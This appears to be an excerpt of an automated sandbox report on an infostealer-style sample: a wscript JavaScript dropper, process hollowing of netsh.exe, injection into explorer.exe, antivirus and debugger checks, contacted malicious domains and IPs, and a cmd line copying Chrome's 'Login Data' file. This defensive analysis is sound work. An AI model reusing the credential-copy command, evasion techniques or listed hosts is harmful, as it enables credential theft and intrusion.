Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337FE87 mov eax, dword ptr fs:[00000030h] 18_2_0337FE87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F76E2 mov eax, dword ptr fs:[00000030h] 18_2_032F76E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033116E0 mov ecx, dword ptr fs:[00000030h] 18_2_033116E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03312AE4 mov eax, dword ptr fs:[00000030h] 18_2_03312AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8ED6 mov eax, dword ptr fs:[00000030h] 18_2_033B8ED6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03328EC7 mov eax, dword ptr fs:[00000030h] 18_2_03328EC7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0339FEC0 mov eax, dword ptr fs:[00000030h] 18_2_0339FEC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03312ACB mov eax, dword ptr fs:[00000030h] 18_2_03312ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033136CC mov eax, dword ptr fs:[00000030h] 18_2_033136CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0336A537 mov eax, dword ptr fs:[00000030h] 18_2_0336A537
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03314D3B mov eax, dword ptr fs:[00000030h] 18_2_03314D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03314D3B mov eax, dword ptr fs:[00000030h] 18_2_03314D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03314D3B mov eax, dword ptr fs:[00000030h] 18_2_03314D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331513A mov eax, dword ptr fs:[00000030h] 18_2_0331513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331513A mov eax, dword ptr fs:[00000030h] 18_2_0331513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8D34 mov eax, dword ptr fs:[00000030h] 18_2_033B8D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov eax, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov eax, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov eax, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov eax, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03304120 mov ecx, dword ptr fs:[00000030h] 18_2_03304120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F3D34 mov eax, dword ptr fs:[00000030h] 18_2_032F3D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EAD30 mov eax, dword ptr fs:[00000030h] 18_2_032EAD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9100 mov eax, dword ptr fs:[00000030h] 18_2_032E9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9100 mov eax, dword ptr fs:[00000030h] 18_2_032E9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9100 mov eax, dword ptr fs:[00000030h] 18_2_032E9100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330C577 mov eax, dword ptr fs:[00000030h] 18_2_0330C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330C577 mov eax, dword ptr fs:[00000030h] 18_2_0330C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EC962 mov eax, dword ptr fs:[00000030h] 18_2_032EC962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB171 mov eax, dword ptr fs:[00000030h] 18_2_032EB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB171 mov eax, dword ptr fs:[00000030h] 18_2_032EB171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03307D50 mov eax, dword ptr fs:[00000030h] 18_2_03307D50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03323D43 mov eax, dword ptr fs:[00000030h] 18_2_03323D43
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330B944 mov eax, dword ptr fs:[00000030h] 18_2_0330B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330B944 mov eax, dword ptr fs:[00000030h] 18_2_0330B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03363540 mov eax, dword ptr fs:[00000030h] 18_2_03363540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03311DB5 mov eax, dword ptr fs:[00000030h] 18_2_03311DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03311DB5 mov eax, dword ptr fs:[00000030h] 18_2_03311DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03311DB5 mov eax, dword ptr fs:[00000030h] 18_2_03311DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033135A1 mov eax, dword ptr fs:[00000030h] 18_2_033135A1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033669A6 mov eax, dword ptr fs:[00000030h] 18_2_033669A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033161A0 mov eax, dword ptr fs:[00000030h] 18_2_033161A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033161A0 mov eax, dword ptr fs:[00000030h] 18_2_033161A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E2D8A mov eax, dword ptr fs:[00000030h] 18_2_032E2D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331FD9B mov eax, dword ptr fs:[00000030h] 18_2_0331FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331FD9B mov eax, dword ptr fs:[00000030h] 18_2_0331FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330C182 mov eax, dword ptr fs:[00000030h] 18_2_0330C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A185 mov eax, dword ptr fs:[00000030h] 18_2_0331A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03398DF1 mov eax, dword ptr fs:[00000030h] 18_2_03398DF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB1E1 mov eax, dword ptr fs:[00000030h] 18_2_032EB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB1E1 mov eax, dword ptr fs:[00000030h] 18_2_032EB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032EB1E1 mov eax, dword ptr fs:[00000030h] 18_2_032EB1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FD5E0 mov eax, dword ptr fs:[00000030h] 18_2_032FD5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FD5E0 mov eax, dword ptr fs:[00000030h] 18_2_032FD5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033741E8 mov eax, dword ptr fs:[00000030h] 18_2_033741E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB02A mov eax, dword ptr fs:[00000030h] 18_2_032FB02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB02A mov eax, dword ptr fs:[00000030h] 18_2_032FB02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB02A mov eax, dword ptr fs:[00000030h] 18_2_032FB02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032FB02A mov eax, dword ptr fs:[00000030h] 18_2_032FB02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331002D mov eax, dword ptr fs:[00000030h] 18_2_0331002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331BC2C mov eax, dword ptr fs:[00000030h] 18_2_0331BC2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367016 mov eax, dword ptr fs:[00000030h] 18_2_03367016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367016 mov eax, dword ptr fs:[00000030h] 18_2_03367016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03367016 mov eax, dword ptr fs:[00000030h] 18_2_03367016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B4015 mov eax, dword ptr fs:[00000030h] 18_2_033B4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B4015 mov eax, dword ptr fs:[00000030h] 18_2_033B4015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B740D mov eax, dword ptr fs:[00000030h] 18_2_033B740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B740D mov eax, dword ptr fs:[00000030h] 18_2_033B740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B740D mov eax, dword ptr fs:[00000030h] 18_2_033B740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A1C06 mov eax, dword ptr fs:[00000030h] 18_2_033A1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366C0A mov eax, dword ptr fs:[00000030h] 18_2_03366C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366C0A mov eax, dword ptr fs:[00000030h] 18_2_03366C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366C0A mov eax, dword ptr fs:[00000030h] 18_2_03366C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366C0A mov eax, dword ptr fs:[00000030h] 18_2_03366C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A2073 mov eax, dword ptr fs:[00000030h] 18_2_033A2073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B1074 mov eax, dword ptr fs:[00000030h] 18_2_033B1074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0330746D mov eax, dword ptr fs:[00000030h] 18_2_0330746D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03300050 mov eax, dword ptr fs:[00000030h] 18_2_03300050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03300050 mov eax, dword ptr fs:[00000030h] 18_2_03300050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337C450 mov eax, dword ptr fs:[00000030h] 18_2_0337C450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337C450 mov eax, dword ptr fs:[00000030h] 18_2_0337C450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331A44B mov eax, dword ptr fs:[00000030h] 18_2_0331A44B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331F0BF mov ecx, dword ptr fs:[00000030h] 18_2_0331F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331F0BF mov eax, dword ptr fs:[00000030h] 18_2_0331F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0331F0BF mov eax, dword ptr fs:[00000030h] 18_2_0331F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033290AF mov eax, dword ptr fs:[00000030h] 18_2_033290AF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032E9080 mov eax, dword ptr fs:[00000030h] 18_2_032E9080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03363884 mov eax, dword ptr fs:[00000030h] 18_2_03363884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03363884 mov eax, dword ptr fs:[00000030h] 18_2_03363884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_032F849B mov eax, dword ptr fs:[00000030h] 18_2_032F849B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033A14FB mov eax, dword ptr fs:[00000030h] 18_2_033A14FB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366CF0 mov eax, dword ptr fs:[00000030h] 18_2_03366CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366CF0 mov eax, dword ptr fs:[00000030h] 18_2_03366CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03366CF0 mov eax, dword ptr fs:[00000030h] 18_2_03366CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0337B8D0 mov eax, dword ptr fs:[00000030h] 18_2_0337B8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033B8CD6 mov eax, dword ptr fs:[00000030h] 18_2_033B8CD6
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013AA140 LdrLoadDll, 2_2_013AA140

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.8.218 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 15.197.142.173 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.161 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Domain query: www.interlink-travel.com
Source: C:\Windows\explorer.exe Domain query: www.geo-pacificoffshore.com
Source: C:\Windows\explorer.exe Domain query: www.lazarusnatura.com
Source: C:\Windows\explorer.exe Domain query: www.brandingaloha.com
Source: C:\Windows\explorer.exe Domain query: www.salondutaxi.com
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.shcylzc.com
Source: C:\Windows\explorer.exe Domain query: www.xn--wsthof-camping-gsb.com
Source: C:\Windows\explorer.exe Domain query: www.nachuejooj07.xyz
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.220.100.142 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.littlebeartreeservices.com
Source: C:\Windows\explorer.exe Domain query: www.kishanshree.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 52.17.43.61 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.jdhwh2nbiw234.com
Source: C:\Windows\explorer.exe Network Connect: 132.148.165.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.82.37.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80 Jump to behavior
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Domain query: www.udrivestorage.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.losangelesrentalz.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: F70000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3968 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000004.00000000.301363457.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.338231014.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.433216017.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000004.00000000.355441466.0000000008154000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.318036625.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.433245938.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366242823.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.338889265.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000004.00000000.339410279.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.366730597.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.433580212.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
